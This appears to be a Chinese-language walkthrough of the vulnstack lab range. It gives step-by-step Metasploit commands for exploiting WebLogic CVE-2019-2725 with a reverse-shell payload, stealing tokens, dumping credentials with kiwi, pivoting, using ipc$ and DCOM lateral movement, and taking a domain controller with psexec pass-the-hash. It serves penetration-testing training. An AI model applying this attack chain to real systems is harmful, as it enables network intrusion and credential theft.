vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:漏洞详情
拓扑结构大体如下:
环境搭建
Kali
ip:192.168.111.135
Web
Ip1:192.168.111.80
Ip2:10.10.10.80
os:windows 2008
应用:weblogic 10.3.6 mssql 2008
Pc
Ip1:192.168.111.201
Ip2:10.10.10.201
Os:windows7
DC
ip:10.10.10.10
os:windows 2012
应用:AD域
内网:10.10.10.0/24
外网:192.168.111.0/24
从web机开始渗透, 这里需要手动开启服务,在C:
\Oracle\Middleware\user_projects\domains\base_domain\bin 有一个startweblogic的批处理, 然后管理员身份运行
账号/密码:Administrator/1qaz@WSX
外网渗透
然后对80 主机进行信息收集扫描
通过445端口开放就存在smb服务可能还会有ms17-010/端口溢出漏洞.
开放139端口 就纯真samba服务 于是判断可能会有/远程命令执行漏洞
开放1433端口 就存在mssql服务 有可能存在爆破/注入/SA弱口令
开放3389 那就是远程桌面喽
7001端口 百度了一下得知是 weblogic服务
weblogicScan进行扫描漏洞
然后百度了一下 CVE-2019-2725漏洞
CVE-2019-2725是一个 weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder(xml解码器)反序列化漏洞
然后通过msf查看一下漏洞利用脚本
然后进入开始利用模块
use exploit/multi/misc/weblogic_deserialize_asyncresponseservice 进入CVE-2019-2725攻击漏洞模块
set target windows 这个模块默认是unix 所以我们的目标是windows 所以 改一下即可
Set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.111.135
Set rhosts 192.168.111.80 要攻击目标
run
本来想直接提权,但是发现不能提system权限
system权限
方法1.
然后通过显示进程pid 然后用 migrate 进行进程迁移 获得system权限
方法2.
还可以通过令牌窃取的方式进行提权
load incognito #加载incognito(伪装)
Getuid #查看当前token
list_tokens -u #列出可用token
impersonate_token "NT AUTHORITY\\SYSTEM" #token窃取,格式为impersonate_token"主机名\\用户名"
rev2self #返回之前的token
然后使用 kiwi 获取 hash 账号密码
然后获得了域里的用户和密码 下面使用用户密码进行远程登录
开始第二阶段的信息搜集
Net config workstation #查域信息
得到域信息 还有10.10.10.0/24网段
设置一条通往10.10.10.0/24网段的路由
然后设置代理
使用use post/windows/gather/arp_scanner模块
扫描网段存活主机
然后又通过web 进行信息收集了一下
得知 10.10.10.10 就是域控
域成员 处理web 还有一个PC机
然后判断PC ip是10.10.10.201
下面渗透pc域用户
方法一
首先用kali生成一个payload
然后通过web机 上传到 10.10.10.201c盘
先上传到web里
再控制WEB主机与PC建立一个ipc$连接:
net use \\10.10.10.201\ipc$ "lbb1111.." /user:administrator
然后把刚才上传的文件copy到10.10.10.201 c盘
然后再meterpreter中载入powershell模块
在powershell里面执行如下命令,控制WEB主机使用DCOM在远程机器PC上执行刚刚上传到PC主机C盘里的木马:
然后从新开启一个msf 监听生成的 payload 1520 端口
成功反弹
下面开始提权
方法二
代理nmap扫描10.10.10.201
使用 exploit/windows/smb/psexec模块进行哈希传递
由于一开始再web机得知了域\用户\密码
说以就可以用这个模块直接打了
Set smbdomain DE1AY #域
Set smbuser administrator # 域用户
Set smbpass lbb1111.. #域用户密码
直接system权限
通过扫描得知3389是开哒
然后尝试一下代理远程能不能直接登录
同样直接利用msf的exploit/windows/smb/psexec模块进行哈希传递
拿下域控制器 并且是system权限